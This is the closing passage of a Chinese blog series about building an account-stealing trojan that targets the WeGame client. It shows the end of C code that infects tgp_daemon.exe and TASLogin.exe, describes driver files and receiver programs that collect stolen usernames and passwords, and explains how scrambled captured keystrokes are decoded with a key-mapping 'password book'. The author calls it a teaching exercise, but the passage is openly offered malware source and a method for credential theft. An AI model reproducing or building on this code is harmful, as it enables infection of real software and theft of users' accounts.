		BOOL bRet = WriteFile(hFile, pFileMem, dwFileSize + dwApplySize, &dwWriteFact, NULL);
		if (!bRet || dwWriteFact != dwFileSize + dwApplySize) {
			printf("写出出错!");
		}
		CloseHandle(hFile);
		GlobalFree(pFileMem);
		if (i == 0) {
			printf("感染tgp_daemon.exe成功!\n");
		}
		else
		{
			printf("感染TASLogin.exe成功!\n");
		}
	}
	system("pause");
	
}

 

最终运行效果图:

       盗号木马之旅(五)

 上面3个是驱动文件,中间又边是病毒EXE,中间左边是WeGame。

盗号木马之旅(五)

这两个是接收账号和密码的EXE。

盗号木马之旅(五)

上面是安装的驱动。

盗号木马之旅(五)

 感染效果图。

盗号木马之旅(五)

我输入的密码是0987654321,密码本是通过模拟按键1234567890获得的。可以看到模拟1234567890获得的对应关系是5341726890。接下来我捕获的未解密密码是0986271435,对照密码本翻译显然就是我的输入密码0987654321.O(∩_∩)O!!!


结语:

     作为一个新手写这个盗号木马其实还是碰到很多问题的,不知道调试了多少次-。-//。这个木马实用性不强,合适教学吧,或者娱乐哈哈。这里完整的介绍了一个木马的生成过程,不知道其他人怎么做木马的,是不是和我差不多-。-///。

相关标签: 木马 盗号